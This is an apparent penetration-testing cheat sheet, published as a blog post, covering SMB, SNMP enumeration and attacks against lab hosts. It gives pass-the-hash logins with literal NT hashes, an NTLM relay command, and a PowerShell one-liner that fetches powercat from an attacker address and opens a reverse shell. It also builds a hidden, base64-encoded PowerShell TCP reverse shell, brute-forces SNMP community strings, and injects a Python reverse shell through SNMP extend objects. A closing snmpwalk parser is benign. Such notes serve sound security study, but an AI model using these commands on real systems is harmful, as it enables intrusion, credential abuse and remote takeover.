SMB, SMTP, SNMP enum

SMB attack

Tools for managing and enumerating SMB:
enum4linux
CrackMapExec
smbclient

List the shares on a host:
smbclient -L //ip

Login with an NT hash (pass-the-hash)

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
dir
get secrets.txt
  • -U set the user
  • --pw-nt-hash use the password's NT hash instead of the password

Login with a password

smbclient \\\\172.16.205.11\\test -U joe --password=Flowers1

Tools for command execution:
impacket-wmiexec
impacket-psexec

Using a hash:

impacket-psexec -hashes 00000000000000000000000000000000:b2c03054c306ac8fc5f9d188710b0168 administrator@192.168.214.121
impacket-wmiexec -hashes 00000000000000000000000000000000:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.216.70
  • -hashes takes “LMHash:NTHash”; if there is no LM hash, use 32 zeros in its place
  • second parameter: “username@ip”

Using a password to get a shell:

impacket-smbexec MEDTECH/joe:Flowers1@172.16.205.11

impacket-ntlmrelayx

SMB relay of a password hash (one you cannot crack), with no UAC in the way.
This module relays a captured authentication to the target and runs a command there using the password hash; it works when the account has the same hash on both machines.

Example:
users:
machine: FILE01 FILE02
users in FILE01:
sam administrator file02admin
users in FILE02:
dave administrator file02admin

So if we capture the authentication message (hash) of file02admin, we can relay that authentication to pass FILE02's authentication and execute the command there.
The SMB authentication involved is Net-NTLMv2.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."

PowerShell reverse shell one-liner

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.210/powercat.ps1');powercat -c 192.168.45.210 -p 4444 -e cmd

https://www.base64encode.org/ encode the one-liner with the UTF-16LE charset (this is the encoding PowerShell's -enc expects)

Reverse shell in pure PowerShell (Python script that builds the encoded command)

import base64

# PowerShell TCP reverse shell one-liner; the IP and port are the page's example values.
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.205.121",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# powershell -e expects base64 of the command as UTF-16LE text without a BOM;
# 'utf-16le' gives exactly that on any platform ('utf16' would add a BOM and follow host endianness).
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
  • --no-http-server disable the HTTP server, because we use SMB relay
  • -t set the target
  • -smb2support add SMB2 support
  • -c set the command
    On the FILE01 machine, trigger the authentication to the relay host:
    dir \\192.168.45.210\test

List the contents of an SMB share

# PowerShell
ls \\192.168.1.1\share
# cmd
dir \\192.168.1.1\share

net view (Windows)

net view \\name /all

nbtscan

SMTP

skip!!!

SNMP enum

Reference: snmp hacktricks
SNMP MIB tree

OID                      Name
1.3.6.1.2.1.25.1.6.0     System Processes
1.3.6.1.2.1.25.4.2.1.2   Running Programs
1.3.6.1.2.1.25.4.2.1.4   Processes Path
1.3.6.1.2.1.25.2.3.1.4   Storage Units
1.3.6.1.2.1.25.6.3.1.2   Software Name
1.3.6.1.4.1.77.1.2.25    User Accounts
1.3.6.1.2.1.6.13.1.3     TCP Local Ports

Common community strings

public
private
manager

Scan a range:

echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips

Tools:
snmpwalk:
enumerate the whole tree

snmpwalk -c public -Oa -v1 -t 10 192.168.214.149
  • -c set the community string
  • -Oa This parameter will automatically translate any hexadecimal string into ASCII that was otherwise not decoded.
  • -v1 specify the SNMP version number
  • -t set the timeout period

Enumerate the users (OID 1.3.6.1.4.1.77.1.2.25 from the table):
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.4.1.77.1.2.25

Enumerate the processes:
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.4.2.1.2

Enumerate the installed software:
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.6.3.1.2

Enumerate the listening TCP ports:
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.6.13.1.3

Enumerate the NET-SNMP extend output:
snmpwalk -v 2c -c public 192.168.240.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

Brute-force the community string:

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute 192.168.214.149 --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.214.149
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.214.149 snmp
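The snmpwalk commands above return raw "oid = TYPE: value" lines that are tedious to read by hand. As an added example (not from the original post), here is a small Python parser that groups such lines by the OIDs in the MIB table and performs the same hex-to-ASCII translation that -Oa does; the sample output it runs on is constructed, not captured from a real host.

```python
import re

# OID prefixes from the MIB table on this page, mapped to a label.
OID_CATEGORIES = {
    "1.3.6.1.2.1.25.1.6.0": "system_processes",
    "1.3.6.1.2.1.25.4.2.1.2": "running_programs",
    "1.3.6.1.2.1.25.4.2.1.4": "process_paths",
    "1.3.6.1.2.1.25.2.3.1.4": "storage_units",
    "1.3.6.1.2.1.25.6.3.1.2": "software_names",
    "1.3.6.1.4.1.77.1.2.25": "user_accounts",
    "1.3.6.1.2.1.6.13.1.3": "tcp_local_ports",
}

# One snmpwalk line: "<oid> = <TYPE>: <value>"
LINE_RE = re.compile(r"^(?P<oid>[\w.:-]+) = (?P<type>[\w-]+): ?(?P<value>.*)$")

def parse_value(vtype, raw):
    if vtype == "STRING":
        return raw.strip('"')
    if vtype == "Hex-STRING":
        # Same translation snmpwalk -Oa performs: hex bytes -> ASCII text.
        data = bytes.fromhex("".join(raw.split()))
        return data.rstrip(b"\x00").decode("ascii", errors="replace")
    if vtype in ("INTEGER", "Gauge32", "Counter32"):
        m = re.search(r"-?\d+", raw)      # INTEGER may look like "up(1)"
        return int(m.group()) if m else raw
    return raw

def parse_snmpwalk(text):
    """Group snmpwalk output lines by the table's OIDs; other OIDs are skipped."""
    result = {label: [] for label in OID_CATEGORIES.values()}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # Without MIBs loaded snmpwalk prints "iso.3.6..."; normalise to numeric form.
        oid = m.group("oid").replace("iso.", "1.", 1)
        for prefix, label in OID_CATEGORIES.items():
            if oid == prefix or oid.startswith(prefix + "."):
                result[label].append(parse_value(m.group("type"), m.group("value")))
                break
    return result

# Constructed sample output (not captured from a real host).
SAMPLE = r'''iso.3.6.1.2.1.25.1.6.0 = Gauge32: 73
iso.3.6.1.2.1.25.4.2.1.2.512 = STRING: "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.4.512 = STRING: "C:\Windows\system32\svchost.exe"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = Hex-STRING: 47 75 65 73 74
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.0 = INTEGER: 3389
'''
```

Feed it the saved output of a full walk (snmpwalk ... > walk.txt) and call parse_snmpwalk on the file contents; the same grouping is handy when auditing what an agent exposes over a default community string.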

RCE in SNMP

Reference: SNMP RCE hacktricks
If you can enumerate the NET-SNMP-EXTEND-MIB run-on-read objects, it can lead to RCE:

snmpwalk -v2c -c public 192.168.214.149 NET-SNMP-EXTEND-MIB::nsExtendObjects

Test: inject a command

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c public 192.168.214.149 \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Execute it (walking the extend objects runs the command):

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

Inject a reverse shell
Reference: https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Listen on the port, then execute it:

snmpwalk -v2c -c public 192.168.214.149 NET-SNMP-EXTEND-MIB::nsExtendObjects

Or use the snmp-shell exploit:
https://github.com/mxrch/snmp-shell

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Usage:

rlwrap python3 shell.py 192.168.214.149 -c public

If you need to execute a long command, such as adding your SSH public key, run legacy.py instead.
Use an ed25519 SSH public key rather than an RSA one; it is shorter.


SMB, SMTP, SNMP enum
https://rightevil.github.io/SMB-SMTP-SNMP-enum/
Author
rightevil
Published on
March 12, 2024
License